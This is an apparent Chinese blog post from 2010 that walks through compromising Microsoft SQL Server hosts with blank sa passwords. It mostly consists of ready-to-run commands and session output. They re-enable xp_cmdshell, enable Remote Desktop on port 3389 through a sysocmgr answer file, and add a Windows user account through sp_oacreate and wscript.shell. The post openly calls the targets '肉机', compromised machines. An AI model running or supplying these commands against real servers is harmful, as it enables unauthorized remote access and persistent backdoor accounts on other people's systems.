直接用SQL连接器开启3389

huanghuaibin

浏览: 68333 次
性别:
来自: 厦门

最近访客更多访客>>

admin..

一口大锅不煮饭

lincc520

binnerMei

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

博客分类：

Computer

SQL SQL Server XP C C++

一、用SQL连接器恢复XP_CMDSHLLE的命令

（1）SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

（2）首先在SqlExec Sunx Version的Format选项里填上%s，在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

（3）MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

修改sa密码 sp_password @old = null, @new = 'complexpwd', @loginame ='sa'
这个很简单,自己堵后门用:)

二、在可以运行XP_CMDSHELL的机器上直接开3389不需要上传的

实例过程：
连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机
命令:xp_cmdshell "type c:\boot.ini" // 输入命令，看系统，server版的才能开3389
执行成功,结果:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

命令:xp_cmdshell "echo [Components] > c:\duguxike" //在c盘根目录建写入一个文件，文件名duguxike大家可以自己改为自己的
执行成功,结果:

命令:xp_cmdshell "echo TsEnable = on >> c:\duguxike" //追加写入
执行成功,结果:

命令:xp_cmdshell "type c:\duguxike" //看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable = on
TsEnable = on

命令:xp_cmdshell "sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\duguxike /q" //开3389，成功的话过会肉机会重启！！
执行成功,结果:
GetLocalManagedApplications returned (2)

之后就看大家的了，不过要记得册除新建的duguxike文件哦！！

三、不需要XP_CMDSHLL直接添加系统帐号,对XPLOG70.DLL被删很有效

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user gchn aaa /add'--
_content>如果XPCMDSHLL被删了第一条恢复
第二条可以执行XPCMDSHELL但是无法利用差异备分来上传的情况下使用(本人WIN2000下测试成功)
第三条XPLOG70.DLL被删除的情况下直接添加帐号前提对方了开了3389 139 23
才好用

分享到：

常用端口 | 配置系统未能初始化错误的解决方案

2010-12-28 09:04
浏览 1576
评论(0)
分类:操作系统
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论